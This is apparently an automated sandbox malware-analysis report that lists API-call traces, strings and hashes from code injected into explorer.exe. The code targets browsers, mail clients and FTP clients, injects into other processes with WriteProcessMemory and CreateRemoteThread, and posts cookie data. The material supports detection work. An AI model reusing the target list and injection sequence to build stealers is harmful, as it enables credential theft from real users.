Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 2c2ce8644e761b390320adb1862dcb066d62c6273cfdd3140e38679bf6a36e31
Instruction ID: 4332f614b7d71045073736157a3a8c043e49d028cef2629527b7fd8077104d7e
Opcode Fuzzy Hash: 2c2ce8644e761b390320adb1862dcb066d62c6273cfdd3140e38679bf6a36e31
Instruction Fuzzy Hash: 2B817C75644350AFD7249F68D884A2BBBE9EFC8354F04092DF549E3241DFB0D908CBA2

Function 02C223E3 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02C2104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,02C22A16,?,00000001), ref: 02C21056

lstrcat.KERNEL32(?,00000000), ref: 02C225BB
lstrcat.KERNEL32(?,02C242A8), ref: 02C225C7
lstrcat.KERNEL32(?,?), ref: 02C225D6
lstrcat.KERNEL32(?,02C242AC), ref: 02C225E5

Strings

dyn_header, xrefs: 02C224C8
?, xrefs: 02C22463
:authority, xrefs: 02C2243A

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: lstrcat$AllocVirtual
String ID: :authority$?$dyn_header
API String ID: 3028025275-1785586894
Opcode ID: e78177e2f7da233660927a77ec9603eda73aa7310b363b702370ec87f4d8f252
Instruction ID: a51f0f1875ac63733e327b8a36af268a75cfc8fce01421fcb34b0a0b0f34bdae
Opcode Fuzzy Hash: e78177e2f7da233660927a77ec9603eda73aa7310b363b702370ec87f4d8f252
Instruction Fuzzy Hash: 6C6107725083368FC724EE25D1D03AAB7EAABD4614F44092DEC8557282DF749E0DDBA3

Function 02C228AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02C21141: lstrlen.KERNEL32(?,?,?,00000000,?,02C229DD,00000001), ref: 02C21150
Part of subcall function 02C21141: lstrlen.KERNEL32(:method POST,?,00000000,?,02C229DD,00000001), ref: 02C21155

RtlMoveMemory.NTDLL(?,?,-00000008), ref: 02C2291B
lstrcat.KERNEL32(?,02C242BC), ref: 02C2292A
lstrlen.KERNEL32(?,774C8A60,00000001,?,?,00000000,?,?,02C22B26,?,?,?,?,00000001), ref: 02C2295C

Strings

cookie , xrefs: 02C228D4, 02C2293C

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: lstrlen$MemoryMovelstrcat
String ID: cookie
API String ID: 2957667536-1295510418
Opcode ID: 46bb471f51c402cdb321e2a6733dbc6b3987a7806e16a1e4ffc7cfa564e71703
Instruction ID: 2dc82583ee7e4113b2bcc69289f6e8752a6f262e587b579c8bfa17ee12e6e944
Opcode Fuzzy Hash: 46bb471f51c402cdb321e2a6733dbc6b3987a7806e16a1e4ffc7cfa564e71703
Instruction Fuzzy Hash: FA11E7323043225BC724AE99DC84BAB76E9DB80704F15052DFC01A7241EFF1E94E8792

Function 02C21E4C Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 02C21E83
LoadLibraryA.KERNEL32(?,02C26058,00000000,00000000,774D2EE0,00000000,02C220DC,?), ref: 02C21EAB
GetProcAddress.KERNEL32(00000000,-00000002), ref: 02C21ED8
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02C21F29

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 0a5b21b3eb104e91c7a53354af4cbd0c060c27e86a99b61e7810e9fff666c9cc
Instruction ID: dc895c709b65c001b58922d210e824a76dda699596d1a777c4c6d3bd455f7ea9
Opcode Fuzzy Hash: 0a5b21b3eb104e91c7a53354af4cbd0c060c27e86a99b61e7810e9fff666c9cc
Instruction Fuzzy Hash: 1531B8717002219BC724CF29CC84766B7D8FF45358B09456CE859C7602DBF2E559C7A0

Function 02C212AA Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000), ref: 02C212BC
IsWow64Process.KERNEL32(000000FF,?), ref: 02C212CE
IsWow64Process.KERNEL32(00000000,?), ref: 02C212E1
CloseHandle.KERNEL32(00000000), ref: 02C212F7

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: 9d282412743b22427e5144fa9f9b95d6fb411c0de8913bfb8d1890158a6b3b72
Instruction ID: 5941ad69eb6cb3c31b46fb644da5081f4c373c47638c2a646fed50159c5fc7cf
Opcode Fuzzy Hash: 9d282412743b22427e5144fa9f9b95d6fb411c0de8913bfb8d1890158a6b3b72
Instruction Fuzzy Hash: 78F09071C56228FF9B24CFA0A9449EEBB6CEB01255F14436AF805D2141DB714F49DAE1

Function 02C232F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02C26038), ref: 02C23332
RtlLeaveCriticalSection.NTDLL(02C26038), ref: 02C23358

Strings

POST, xrefs: 02C23338

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: POST
API String ID: 3168844106-1814004025
Opcode ID: 6e5459986333712007ec4e798466db04d55932a85ef9889c97f468d42149e694
Instruction ID: 0ea3437da5e0f22bec42dae31167738d4423d52cfa35263f32e4830ecef3bb5c
Opcode Fuzzy Hash: 6e5459986333712007ec4e798466db04d55932a85ef9889c97f468d42149e694
Instruction Fuzzy Hash: 6A01A231900274EBCB311F14E94896E7B2AEFC57617140451F90E83111CF35CA6EEAF1

Analysis Process: explorer.exePID: 4232, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	42%
Signature Coverage:	0%
Total number of Nodes:	50
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00A01DB0 Relevance: 4.6, APIs: 3, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00A01E03
FindNextFileW.KERNELBASE ref: 00A01E7B
FindClose.KERNELBASE ref: 00A01E88

Part of subcall function 00A01EB4: FindFirstFileW.KERNELBASE ref: 00A01F05
Part of subcall function 00A01EB4: FindNextFileW.KERNELBASE ref: 00A01F7C
Part of subcall function 00A01EB4: FindClose.KERNELBASE ref: 00A01F89

Memory Dump Source

Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a01000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
Instruction ID: f0260a3e05334e28ef0d7f959e7ca45b8015ed9052afc4be78d86b417a333f43
Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
Instruction Fuzzy Hash: FE216F3121CE0C4BDB58EB2CF8992AD77D1EB98350F40466DF98EC32D6DE3899058785

Function 00A01EB4 Relevance: 4.6, APIs: 3, Instructions: 94
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A01DB0: FindFirstFileW.KERNELBASE ref: 00A01E03
Part of subcall function 00A01DB0: FindNextFileW.KERNELBASE ref: 00A01E7B
Part of subcall function 00A01DB0: FindClose.KERNELBASE ref: 00A01E88

FindFirstFileW.KERNELBASE ref: 00A01F05
FindNextFileW.KERNELBASE ref: 00A01F7C
FindClose.KERNELBASE ref: 00A01F89

Memory Dump Source

Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a01000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
Instruction ID: ce31552f2af1e64724b654d1536646c45cf84d21af117f2f05c842e7c579bd45
Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
Instruction Fuzzy Hash: D121327020CA4C4FDF44FF28A4997A977E1FBA8344F00066DA55AC32D2DF38DA488785

Function 00A05300 Relevance: 1.6, APIs: 1, Instructions: 71
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00A05378

Memory Dump Source

Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a01000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
Instruction ID: 2eed2611f6adb8e46f4581c2c5d799a1fe9df2add04c7c1a8910f67e12c3c36d
Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
Instruction Fuzzy Hash: 5611A330A01D0D4BEB5DB7B964A967A3395EB14301F54452AA415CA2E1DA698A408701

Function 00A01D08 Relevance: 6.0, APIs: 4, Instructions: 47
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A01D1D
Process32First.KERNEL32 ref: 00A01D3C
Process32Next.KERNEL32 ref: 00A01D67
CloseHandle.KERNELBASE ref: 00A01D74

Memory Dump Source

Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a01000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
Instruction ID: b7a8b5496bc00a297fa8f5687988fe97169e2871de6558757b73c15bb8c00770
Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
Instruction Fuzzy Hash: 45016230208A088FE755EF28E8887EE76E2FBDC315F004B2DA15EC7194DB38D9458B45

Function 00A0D748 Relevance: 4.7, APIs: 3, Instructions: 246
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 00A0D847
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00A0D8E5
VirtualProtect.KERNELBASE ref: 00A0D903

Memory Dump Source

Source File: 00000017.00000002.2112682969.0000000000A0C000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A0C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a0c000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
Instruction ID: 4debb50baee0bdd4726e8daa9fa60d7dc1865b9c6b2ab553629134d50674ddb7
Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
Instruction Fuzzy Hash: C4517B3365491D4BCB24ABBCBCC43F5B7D1FB55335B58063AD49AC32C5EA68D84A8381

Function 00A01B74 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 00A01B8B
MapViewOfFile.KERNELBASE ref: 00A01BAA

Memory Dump Source

Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a01000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
Instruction ID: 9f0c804ab2bd3f3f67a42ff66183b25b325b68ee4baa2aaa1fbe8960b73e3913
Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
Instruction Fuzzy Hash: A4F05834218F094FAB44EF7C9CCC126B7E0EBA8302B008A7AA84AC6164EF74C8808701

Function 00A04914 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A01D08: CreateToolhelp32Snapshot.KERNEL32 ref: 00A01D1D
Part of subcall function 00A01D08: Process32First.KERNEL32 ref: 00A01D3C
Part of subcall function 00A01D08: CloseHandle.KERNELBASE ref: 00A01D74

Part of subcall function 00A01D08: Process32Next.KERNEL32 ref: 00A01D67

SleepEx.KERNELBASE ref: 00A04952

Part of subcall function 00A01EB4: FindFirstFileW.KERNELBASE ref: 00A01F05
Part of subcall function 00A01EB4: FindNextFileW.KERNELBASE ref: 00A01F7C
Part of subcall function 00A01EB4: FindClose.KERNELBASE ref: 00A01F89

Memory Dump Source

Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a01000_explorer.jbxd

Similarity

API ID: Find$CloseFileFirstNextProcess32$CreateHandleSleepSnapshotToolhelp32
String ID:
API String ID: 1868932505-0
Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
Instruction ID: 6c7bd7b756569691e78759491c87d2314865bded404f6a2467c922518eccbdb5
Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
Instruction Fuzzy Hash: EF31A731618A0C4FDB59FF68F8995EE73E2FB98301B10462EE54BC31A1DE34994587C0

Analysis Process: explorer.exePID: 3108, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	0%
Total number of Nodes:	306
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02A21016 Relevance: 89.5, APIs: 30, Strings: 21, Instructions: 244
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A22608: VirtualQuery.KERNEL32(02A24434,?,0000001C), ref: 02A22615

Part of subcall function 02A22861: GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
Part of subcall function 02A22861: RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02A21038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02A2106B
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02A21074
GetCurrentProcessId.KERNEL32(?,02A21010), ref: 02A2107A
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A210DF
Process32First.KERNEL32(00000000,?), ref: 02A210FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02A2111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02A2112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02A21142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 02A21156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02A21166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02A2117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 02A2118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 02A211A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 02A211B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 02A211CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 02A211DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 02A211F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02A21206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02A21216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02A21226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02A21236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 02A21246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02A21256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02A21266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02A21276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02A212B4
Process32Next.KERNEL32(00000000,00000128), ref: 02A2130B
CloseHandle.KERNELBASE(00000000), ref: 02A2131C
Sleep.KERNELBASE(000003E8), ref: 02A21327

Strings

foxmail.exe, xrefs: 02A2124C
thebat32.exe, xrefs: 02A21198
filezilla.exe, xrefs: 02A211D4
cuteftppro.exe, xrefs: 02A2121C
smartftp.exe, xrefs: 02A211E8
alimail.exe, xrefs: 02A2125C
microsoftedgecp.exe, xrefs: 02A210D2, 02A21160, 02A212AE
firefox.exe, xrefs: 02A21114
iexplore.exe, xrefs: 02A21124
chrome.exe, xrefs: 02A21138
thunderbird.exe, xrefs: 02A211C0
flashfxp.exe, xrefs: 02A2120C
0-gwP,gw, xrefs: 02A21074
mailmaster.exe, xrefs: 02A2122C
thebat64.exe, xrefs: 02A211AC
outlook.exe, xrefs: 02A21170
winscp.exe, xrefs: 02A211FC
thebat.exe, xrefs: 02A21184
mailchat.exe, xrefs: 02A2126C
opera.exe, xrefs: 02A2114C
263em.exe, xrefs: 02A2123C

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
String ID: 0-gwP,gw$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 2555639992-1208099918
Opcode ID: a9fcf3c78f685ff8069baeb17fce91bcb1d4428edb62954528d5b7ce963cba21
Instruction ID: fef84dfcc07ddd3dceafefc1d96232d3f807296feca08ace463b479821f0b77a
Opcode Fuzzy Hash: a9fcf3c78f685ff8069baeb17fce91bcb1d4428edb62954528d5b7ce963cba21
Instruction Fuzzy Hash: 1D71A231A44325ABEF10DB7C9E84E7A7BADAF46780B050969F945D2041EF28D50E8F74

Function 02A210A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A22861: GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
Part of subcall function 02A22861: RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A210DF
Process32First.KERNEL32(00000000,?), ref: 02A210FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02A2111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02A2112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02A21142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 02A21156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02A21166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02A2117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 02A2118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 02A211A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 02A211B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 02A211CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 02A211DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 02A211F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02A21206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02A21216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02A21226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02A21236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 02A21246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02A21256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02A21266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02A21276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02A212B4
Process32Next.KERNEL32(00000000,00000128), ref: 02A2130B
CloseHandle.KERNELBASE(00000000), ref: 02A2131C
Sleep.KERNELBASE(000003E8), ref: 02A21327

Strings

foxmail.exe, xrefs: 02A2124C
thebat32.exe, xrefs: 02A21198
filezilla.exe, xrefs: 02A211D4
cuteftppro.exe, xrefs: 02A2121C
smartftp.exe, xrefs: 02A211E8
alimail.exe, xrefs: 02A2125C
microsoftedgecp.exe, xrefs: 02A210D2, 02A21160, 02A212AE
firefox.exe, xrefs: 02A21114
iexplore.exe, xrefs: 02A21124
chrome.exe, xrefs: 02A21138
thunderbird.exe, xrefs: 02A211C0
flashfxp.exe, xrefs: 02A2120C
mailmaster.exe, xrefs: 02A2122C
thebat64.exe, xrefs: 02A211AC
outlook.exe, xrefs: 02A21170
winscp.exe, xrefs: 02A211FC
thebat.exe, xrefs: 02A21184
mailchat.exe, xrefs: 02A2126C
opera.exe, xrefs: 02A2114C
263em.exe, xrefs: 02A2123C

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 3950187957-1680033604
Opcode ID: 1d7ba66fde751b97d6e11d963116d1631495f3fa92756d5420264a82ec81a9b5
Instruction ID: 20ceb17e01d443ba98b7b8b6f03c766e95116e725b6f340355927f1cb27e54ce
Opcode Fuzzy Hash: 1d7ba66fde751b97d6e11d963116d1631495f3fa92756d5420264a82ec81a9b5
Instruction Fuzzy Hash: 3651B331A44325A6EF10DBB88E84E7EBBACBF86784B050969F945C2041EF28D50D8F75

Function 02A27728 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A26000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a26000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b80f05bef7a7aa034cf7512a4ba67a7beeaa29d56a755b7085c5317575d8332
Instruction ID: fac84fb0184f7d515884a06c8cfbe810cf3917d7ac1c6e9995a0f77af8b047cc
Opcode Fuzzy Hash: 5b80f05bef7a7aa034cf7512a4ba67a7beeaa29d56a755b7085c5317575d8332
Instruction Fuzzy Hash: 625109719483A28FD7218B7CCCC07B1FBA0DB42220B190679C5E5CB3C6EB945A4DC7A1

Function 02A22861 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 9b13429a72a86bf26bfe63b90776a47729b33c5fa26480c8944fa06e707a7ab4
Instruction ID: aac1a94b45f4490499c02a284610f2eaec4adb9b443fb296215d2b504a89eda7
Opcode Fuzzy Hash: 9b13429a72a86bf26bfe63b90776a47729b33c5fa26480c8944fa06e707a7ab4
Instruction Fuzzy Hash: 42A01270C841007FDD5417A8A80DF253A1AA742301F0108807209C40408D68805D8735

Non-executed Functions

Function 02A21819 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A22608: VirtualQuery.KERNEL32(02A24434,?,0000001C), ref: 02A22615

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,774CE800,microsoftedgecp.exe,?), ref: 02A2184E
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02A21889
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02A21919
RtlMoveMemory.NTDLL(00000000,02A23428,00000016), ref: 02A21940
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02A21968
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02A21978
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A21992
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02A2199A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A219A8
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A219AF
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02A219C5
GetProcAddress.KERNEL32(00000000), ref: 02A219CC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02A219E2
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02A21A0C
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02A21A1F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A26
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A2D
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02A21A41
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A21A58
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A65
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A6B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A71
CloseHandle.KERNEL32(00000000,?,00000000), ref: 02A21A74

Strings

ntdll, xrefs: 02A219C0
atan, xrefs: 02A219BB
0-gwP,gw, xrefs: 02A21910
opera_shared_counter, xrefs: 02A2198B
microsoftedgecp.exe, xrefs: 02A2181D

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: 0-gwP,gw$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
API String ID: 1066286714-2377152254
